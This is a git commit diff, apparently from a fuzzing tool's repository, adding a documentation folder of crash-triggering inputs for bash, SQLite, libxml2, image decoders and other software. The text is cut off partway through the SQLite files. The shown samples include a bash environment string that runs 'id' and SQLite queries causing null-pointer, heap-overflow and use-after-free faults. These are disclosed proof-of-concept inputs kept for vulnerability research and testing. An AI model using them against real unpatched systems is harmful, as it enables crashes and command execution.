about summary refs log tree commit diff
path: root/docs/vuln_samples
diff options
context:
space:
mode:
Diffstat (limited to 'docs/vuln_samples')
-rw-r--r--docs/vuln_samples/bash-cmd-exec.var1
-rw-r--r--docs/vuln_samples/bash-uninit-mem.var1
-rw-r--r--docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4bin0 -> 10377 bytes
-rw-r--r--docs/vuln_samples/ffmpeg-h264-bad-read.mp4bin0 -> 4376 bytes
-rw-r--r--docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4bin0 -> 1259 bytes
-rw-r--r--docs/vuln_samples/file-fpu-exception.elfbin0 -> 2572 bytes
-rw-r--r--docs/vuln_samples/firefox-bmp-leak.bmpbin0 -> 892 bytes
-rw-r--r--docs/vuln_samples/firefox-chrome-leak.jpgbin0 -> 1771 bytes
-rw-r--r--docs/vuln_samples/firefox-gif-leak.gifbin0 -> 38 bytes
-rw-r--r--docs/vuln_samples/firefox-gif-leak2.gifbin0 -> 179 bytes
-rw-r--r--docs/vuln_samples/jxrlib-crash.jxrbin0 -> 512 bytes
-rw-r--r--docs/vuln_samples/jxrlib-crash2.jxrbin0 -> 472 bytes
-rw-r--r--docs/vuln_samples/jxrlib-crash3.jxrbin0 -> 492 bytes
-rw-r--r--docs/vuln_samples/jxrlib-crash4.jxrbin0 -> 526 bytes
-rw-r--r--docs/vuln_samples/lesspipe-cpio-bad-write.cpiobin0 -> 512 bytes
-rw-r--r--docs/vuln_samples/libjpeg-sos-leak.jpgbin0 -> 642 bytes
-rw-r--r--docs/vuln_samples/libjpeg-turbo-dht-leak.jpgbin0 -> 595 bytes
-rw-r--r--docs/vuln_samples/libtiff-bad-write.tifbin0 -> 360 bytes
-rw-r--r--docs/vuln_samples/libtiff-uninit-mem.tifbin0 -> 408 bytes
-rw-r--r--docs/vuln_samples/libtiff-uninit-mem2.tifbin0 -> 408 bytes
-rw-r--r--docs/vuln_samples/libtiff-uninit-mem3.tifbin0 -> 216 bytes
-rw-r--r--docs/vuln_samples/libtiff-uninit-mem4.tifbin0 -> 216 bytes
-rw-r--r--docs/vuln_samples/libxml2-bad-read.xml3
-rw-r--r--docs/vuln_samples/msie-dht-leak.jpgbin0 -> 876 bytes
-rw-r--r--docs/vuln_samples/msie-jxr-mem-leak.jxrbin0 -> 882 bytes
-rw-r--r--docs/vuln_samples/msie-png-mem-leak.pngbin0 -> 293 bytes
-rw-r--r--docs/vuln_samples/msie-tiff-mem-leak.tifbin0 -> 408 bytes
-rw-r--r--docs/vuln_samples/msie-zlib-dos.pngbin0 -> 434 bytes
-rw-r--r--docs/vuln_samples/openssl-null-ptr.derbin0 -> 15 bytes
-rw-r--r--docs/vuln_samples/openssl-null-ptr2.derbin0 -> 398 bytes
-rw-r--r--docs/vuln_samples/photoshop-mem-leak.jpgbin0 -> 996 bytes
-rw-r--r--docs/vuln_samples/sqlite-bad-free.sql2
-rw-r--r--docs/vuln_samples/sqlite-bad-ptr.sql1
-rw-r--r--docs/vuln_samples/sqlite-bad-ptr2.sql1
-rw-r--r--docs/vuln_samples/sqlite-bad-ptr3.sqlbin0 -> 199 bytes
-rw-r--r--docs/vuln_samples/sqlite-heap-overflow.sql2
-rw-r--r--docs/vuln_samples/sqlite-heap-overwrite.sql1
-rw-r--r--docs/vuln_samples/sqlite-negative-memset.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr1.sql2
-rw-r--r--docs/vuln_samples/sqlite-null-ptr10.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr11.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr12.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr13.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr14.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr15.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr2.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr3.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr4.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr5.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr6.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr7.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr8.sql1
-rw-r--r--docs/vuln_samples/sqlite-null-ptr9.sql1
-rw-r--r--docs/vuln_samples/sqlite-oob-read.sql1
-rw-r--r--docs/vuln_samples/sqlite-oob-write.sql6
-rw-r--r--docs/vuln_samples/sqlite-stack-buf-overflow.sql1
-rw-r--r--docs/vuln_samples/sqlite-stack-exhaustion.sql1
-rw-r--r--docs/vuln_samples/sqlite-unint-mem.sql1
-rw-r--r--docs/vuln_samples/sqlite-use-after-free.sql1
-rw-r--r--docs/vuln_samples/strings-bfd-badptr.elfbin0 -> 324 bytes
-rw-r--r--docs/vuln_samples/strings-bfd-badptr2.elfbin0 -> 324 bytes
-rw-r--r--docs/vuln_samples/strings-stack-overflow3
-rw-r--r--docs/vuln_samples/strings-unchecked-ctr.elfbin0 -> 141 bytes
-rw-r--r--docs/vuln_samples/tcpdump-arp-crash.pcapbin0 -> 114 bytes
-rw-r--r--docs/vuln_samples/tcpdump-ppp-crash.pcapbin0 -> 1126 bytes
-rw-r--r--docs/vuln_samples/unrtf-arbitrary-read.rtfbin0 -> 551 bytes
-rw-r--r--docs/vuln_samples/unzip-t-mem-corruption.zipbin0 -> 344 bytes
67 files changed, 43 insertions, 0 deletions
diff --git a/docs/vuln_samples/bash-cmd-exec.var b/docs/vuln_samples/bash-cmd-exec.var
new file mode 100644
index 00000000..6422d427
--- /dev/null
+++ b/docs/vuln_samples/bash-cmd-exec.var
@@ -0,0 +1 @@
+() { _; } >_[$($())] { id; }
\ No newline at end of file
diff --git a/docs/vuln_samples/bash-uninit-mem.var b/docs/vuln_samples/bash-uninit-mem.var
new file mode 100644
index 00000000..6d7d5360
--- /dev/null
+++ b/docs/vuln_samples/bash-uninit-mem.var
@@ -0,0 +1 @@
+() { x() { _; }; x() { _; } <<a; }
\ No newline at end of file
diff --git a/docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4 b/docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4
new file mode 100644
index 00000000..ce23a8bd
--- /dev/null
+++ b/docs/vuln_samples/ffmpeg-h264-bad-ptr-800m.mp4
Binary files differdiff --git a/docs/vuln_samples/ffmpeg-h264-bad-read.mp4 b/docs/vuln_samples/ffmpeg-h264-bad-read.mp4
new file mode 100644
index 00000000..57a0ac90
--- /dev/null
+++ b/docs/vuln_samples/ffmpeg-h264-bad-read.mp4
Binary files differdiff --git a/docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4 b/docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4
new file mode 100644
index 00000000..5471105e
--- /dev/null
+++ b/docs/vuln_samples/ffmpeg-h264-call-stack-overflow.mp4
Binary files differdiff --git a/docs/vuln_samples/file-fpu-exception.elf b/docs/vuln_samples/file-fpu-exception.elf
new file mode 100644
index 00000000..f3a36ef8
--- /dev/null
+++ b/docs/vuln_samples/file-fpu-exception.elf
Binary files differdiff --git a/docs/vuln_samples/firefox-bmp-leak.bmp b/docs/vuln_samples/firefox-bmp-leak.bmp
new file mode 100644
index 00000000..857e2426
--- /dev/null
+++ b/docs/vuln_samples/firefox-bmp-leak.bmp
Binary files differdiff --git a/docs/vuln_samples/firefox-chrome-leak.jpg b/docs/vuln_samples/firefox-chrome-leak.jpg
new file mode 100644
index 00000000..a642d98e
--- /dev/null
+++ b/docs/vuln_samples/firefox-chrome-leak.jpg
Binary files differdiff --git a/docs/vuln_samples/firefox-gif-leak.gif b/docs/vuln_samples/firefox-gif-leak.gif
new file mode 100644
index 00000000..310cd366
--- /dev/null
+++ b/docs/vuln_samples/firefox-gif-leak.gif
Binary files differdiff --git a/docs/vuln_samples/firefox-gif-leak2.gif b/docs/vuln_samples/firefox-gif-leak2.gif
new file mode 100644
index 00000000..bb41696c
--- /dev/null
+++ b/docs/vuln_samples/firefox-gif-leak2.gif
Binary files differdiff --git a/docs/vuln_samples/jxrlib-crash.jxr b/docs/vuln_samples/jxrlib-crash.jxr
new file mode 100644
index 00000000..71d190e3
--- /dev/null
+++ b/docs/vuln_samples/jxrlib-crash.jxr
Binary files differdiff --git a/docs/vuln_samples/jxrlib-crash2.jxr b/docs/vuln_samples/jxrlib-crash2.jxr
new file mode 100644
index 00000000..08313258
--- /dev/null
+++ b/docs/vuln_samples/jxrlib-crash2.jxr
Binary files differdiff --git a/docs/vuln_samples/jxrlib-crash3.jxr b/docs/vuln_samples/jxrlib-crash3.jxr
new file mode 100644
index 00000000..47af7f1e
--- /dev/null
+++ b/docs/vuln_samples/jxrlib-crash3.jxr
Binary files differdiff --git a/docs/vuln_samples/jxrlib-crash4.jxr b/docs/vuln_samples/jxrlib-crash4.jxr
new file mode 100644
index 00000000..51daf47d
--- /dev/null
+++ b/docs/vuln_samples/jxrlib-crash4.jxr
Binary files differdiff --git a/docs/vuln_samples/lesspipe-cpio-bad-write.cpio b/docs/vuln_samples/lesspipe-cpio-bad-write.cpio
new file mode 100644
index 00000000..ec5a992d
--- /dev/null
+++ b/docs/vuln_samples/lesspipe-cpio-bad-write.cpio
Binary files differdiff --git a/docs/vuln_samples/libjpeg-sos-leak.jpg b/docs/vuln_samples/libjpeg-sos-leak.jpg
new file mode 100644
index 00000000..02653b87
--- /dev/null
+++ b/docs/vuln_samples/libjpeg-sos-leak.jpg
Binary files differdiff --git a/docs/vuln_samples/libjpeg-turbo-dht-leak.jpg b/docs/vuln_samples/libjpeg-turbo-dht-leak.jpg
new file mode 100644
index 00000000..cfc21a8a
--- /dev/null
+++ b/docs/vuln_samples/libjpeg-turbo-dht-leak.jpg
Binary files differdiff --git a/docs/vuln_samples/libtiff-bad-write.tif b/docs/vuln_samples/libtiff-bad-write.tif
new file mode 100644
index 00000000..45027cd1
--- /dev/null
+++ b/docs/vuln_samples/libtiff-bad-write.tif
Binary files differdiff --git a/docs/vuln_samples/libtiff-uninit-mem.tif b/docs/vuln_samples/libtiff-uninit-mem.tif
new file mode 100644
index 00000000..b94e2a93
--- /dev/null
+++ b/docs/vuln_samples/libtiff-uninit-mem.tif
Binary files differdiff --git a/docs/vuln_samples/libtiff-uninit-mem2.tif b/docs/vuln_samples/libtiff-uninit-mem2.tif
new file mode 100644
index 00000000..0f9711bf
--- /dev/null
+++ b/docs/vuln_samples/libtiff-uninit-mem2.tif
Binary files differdiff --git a/docs/vuln_samples/libtiff-uninit-mem3.tif b/docs/vuln_samples/libtiff-uninit-mem3.tif
new file mode 100644
index 00000000..6889a3de
--- /dev/null
+++ b/docs/vuln_samples/libtiff-uninit-mem3.tif
Binary files differdiff --git a/docs/vuln_samples/libtiff-uninit-mem4.tif b/docs/vuln_samples/libtiff-uninit-mem4.tif
new file mode 100644
index 00000000..98af970f
--- /dev/null
+++ b/docs/vuln_samples/libtiff-uninit-mem4.tif
Binary files differdiff --git a/docs/vuln_samples/libxml2-bad-read.xml b/docs/vuln_samples/libxml2-bad-read.xml
new file mode 100644
index 00000000..d46fd128
--- /dev/null
+++ b/docs/vuln_samples/libxml2-bad-read.xml
@@ -0,0 +1,3 @@
+<!DOCTYPEd[<!ENTITY
+S	""><!ENTITY %
+N	"<!ELEMENT<![INCLUDE0"<!ENTITYL%N;
\ No newline at end of file
diff --git a/docs/vuln_samples/msie-dht-leak.jpg b/docs/vuln_samples/msie-dht-leak.jpg
new file mode 100644
index 00000000..a0fb121c
--- /dev/null
+++ b/docs/vuln_samples/msie-dht-leak.jpg
Binary files differdiff --git a/docs/vuln_samples/msie-jxr-mem-leak.jxr b/docs/vuln_samples/msie-jxr-mem-leak.jxr
new file mode 100644
index 00000000..519f9c13
--- /dev/null
+++ b/docs/vuln_samples/msie-jxr-mem-leak.jxr
Binary files differdiff --git a/docs/vuln_samples/msie-png-mem-leak.png b/docs/vuln_samples/msie-png-mem-leak.png
new file mode 100644
index 00000000..bc193bf9
--- /dev/null
+++ b/docs/vuln_samples/msie-png-mem-leak.png
Binary files differdiff --git a/docs/vuln_samples/msie-tiff-mem-leak.tif b/docs/vuln_samples/msie-tiff-mem-leak.tif
new file mode 100644
index 00000000..7e937c9b
--- /dev/null
+++ b/docs/vuln_samples/msie-tiff-mem-leak.tif
Binary files differdiff --git a/docs/vuln_samples/msie-zlib-dos.png b/docs/vuln_samples/msie-zlib-dos.png
new file mode 100644
index 00000000..df3ab80b
--- /dev/null
+++ b/docs/vuln_samples/msie-zlib-dos.png
Binary files differdiff --git a/docs/vuln_samples/openssl-null-ptr.der b/docs/vuln_samples/openssl-null-ptr.der
new file mode 100644
index 00000000..dd3975d6
--- /dev/null
+++ b/docs/vuln_samples/openssl-null-ptr.der
Binary files differdiff --git a/docs/vuln_samples/openssl-null-ptr2.der b/docs/vuln_samples/openssl-null-ptr2.der
new file mode 100644
index 00000000..85cf6b05
--- /dev/null
+++ b/docs/vuln_samples/openssl-null-ptr2.der
Binary files differdiff --git a/docs/vuln_samples/photoshop-mem-leak.jpg b/docs/vuln_samples/photoshop-mem-leak.jpg
new file mode 100644
index 00000000..5b9f5917
--- /dev/null
+++ b/docs/vuln_samples/photoshop-mem-leak.jpg
Binary files differdiff --git a/docs/vuln_samples/sqlite-bad-free.sql b/docs/vuln_samples/sqlite-bad-free.sql
new file mode 100644
index 00000000..4e37f49c
--- /dev/null
+++ b/docs/vuln_samples/sqlite-bad-free.sql
@@ -0,0 +1,2 @@
+create table t0(o CHar(0)CHECK(0&O>O));insert into t0
+select randomblob(0)-trim(0);
diff --git a/docs/vuln_samples/sqlite-bad-ptr.sql b/docs/vuln_samples/sqlite-bad-ptr.sql
new file mode 100644
index 00000000..46e78afa
--- /dev/null
+++ b/docs/vuln_samples/sqlite-bad-ptr.sql
@@ -0,0 +1 @@
+SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE"""""""";
diff --git a/docs/vuln_samples/sqlite-bad-ptr2.sql b/docs/vuln_samples/sqlite-bad-ptr2.sql
new file mode 100644
index 00000000..cd613d08
--- /dev/null
+++ b/docs/vuln_samples/sqlite-bad-ptr2.sql
@@ -0,0 +1 @@
+PRAGMA foreign_keys=1;CREATE TABLE t1("""0"PRIMARY KEy REFERENCES t1 ON DELETE SET NULL);REPLACE INTO t1 SELECT(0);
diff --git a/docs/vuln_samples/sqlite-bad-ptr3.sql b/docs/vuln_samples/sqlite-bad-ptr3.sql
new file mode 100644
index 00000000..7518816c
--- /dev/null
+++ b/docs/vuln_samples/sqlite-bad-ptr3.sql
Binary files differdiff --git a/docs/vuln_samples/sqlite-heap-overflow.sql b/docs/vuln_samples/sqlite-heap-overflow.sql
new file mode 100644
index 00000000..066fc835
--- /dev/null
+++ b/docs/vuln_samples/sqlite-heap-overflow.sql
@@ -0,0 +1,2 @@
+DROP TABLE IF EXISTS t;CREATE VIRTUAL TABLE t0 USING fts4();insert into t0 select zeroblob(0);SAVEPOINT O;insert into t0
+select(0);SAVEPOINT E;insert into t0 SELECT 0 UNION SELECT 0'x'ORDER BY x;
diff --git a/docs/vuln_samples/sqlite-heap-overwrite.sql b/docs/vuln_samples/sqlite-heap-overwrite.sql
new file mode 100644
index 00000000..51ed82c3
--- /dev/null
+++ b/docs/vuln_samples/sqlite-heap-overwrite.sql
@@ -0,0 +1 @@
+ATTACH "file:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?mode=memory&cache=shared" AS x;
\ No newline at end of file
diff --git a/docs/vuln_samples/sqlite-negative-memset.sql b/docs/vuln_samples/sqlite-negative-memset.sql
new file mode 100644
index 00000000..d647bea0
--- /dev/null
+++ b/docs/vuln_samples/sqlite-negative-memset.sql
@@ -0,0 +1 @@
+SELECT*from(select"",zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(150000000),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0)),(select"",zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),(0),zeroblob(150000000),(0),zeroblob(0),(0)EXCEPT select zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0));
diff --git a/docs/vuln_samples/sqlite-null-ptr1.sql b/docs/vuln_samples/sqlite-null-ptr1.sql
new file mode 100644
index 00000000..3f9d46c7
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr1.sql
@@ -0,0 +1,2 @@
+create table t0(t);insert into t0
+select strftime();
diff --git a/docs/vuln_samples/sqlite-null-ptr10.sql b/docs/vuln_samples/sqlite-null-ptr10.sql
new file mode 100644
index 00000000..798bbf14
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr10.sql
@@ -0,0 +1 @@
+SELECT fts3_tokenizer(@0());
diff --git a/docs/vuln_samples/sqlite-null-ptr11.sql b/docs/vuln_samples/sqlite-null-ptr11.sql
new file mode 100644
index 00000000..f6bcf65f
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr11.sql
@@ -0,0 +1 @@
+select''like''like''like#0;
diff --git a/docs/vuln_samples/sqlite-null-ptr12.sql b/docs/vuln_samples/sqlite-null-ptr12.sql
new file mode 100644
index 00000000..8d14a86b
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr12.sql
@@ -0,0 +1 @@
+PRAGMA e;select lower(0);select lower(0)"a",""GROUP BY a ORDER BY a;
diff --git a/docs/vuln_samples/sqlite-null-ptr13.sql b/docs/vuln_samples/sqlite-null-ptr13.sql
new file mode 100644
index 00000000..e730db32
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr13.sql
@@ -0,0 +1 @@
+WITH x AS(SELECT*FROM t)SELECT""EXCEPT SELECT 0 ORDER BY 0 COLLATE"";
diff --git a/docs/vuln_samples/sqlite-null-ptr14.sql b/docs/vuln_samples/sqlite-null-ptr14.sql
new file mode 100644
index 00000000..37b9baed
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr14.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE x USING fts4();VALUES(0,0),(0,0),(0,0),(0,0);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql=''WHERE name='';UPDATE sqlite_master SET sql='CREATE table t(d CHECK(T(#0)';SAVEPOINT K;SAVEPOINT T;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
diff --git a/docs/vuln_samples/sqlite-null-ptr15.sql b/docs/vuln_samples/sqlite-null-ptr15.sql
new file mode 100644
index 00000000..83d5c9d1
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr15.sql
@@ -0,0 +1 @@
+CREATE VIRTUAL TABLE t4 USING fts4(0,b,c,notindexed=0);INSERT INTO t4 VALUES('','','0');BEGIN;INSERT INTO t4 VALUES('','','0');INSERT INTO t4(t4)VALUES('integrity-check');
diff --git a/docs/vuln_samples/sqlite-null-ptr2.sql b/docs/vuln_samples/sqlite-null-ptr2.sql
new file mode 100644
index 00000000..11c5a378
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr2.sql
@@ -0,0 +1 @@
+DETACH(select group_concat(q));
diff --git a/docs/vuln_samples/sqlite-null-ptr3.sql b/docs/vuln_samples/sqlite-null-ptr3.sql
new file mode 100644
index 00000000..14df82a7
--- /dev/null
+++ b/docs/vuln_samples/sqlite-null-ptr3.sql
@@ -0,0 +1 @@
+select(select strftime());
diff --git a/docs/vuln_samples/sqlite-null-ptr4.sql b/docs/vuln_samples/sqlite-null-ptr4.sql
new file mode 100644
index 00000000..fdb80476
--- /dev/null
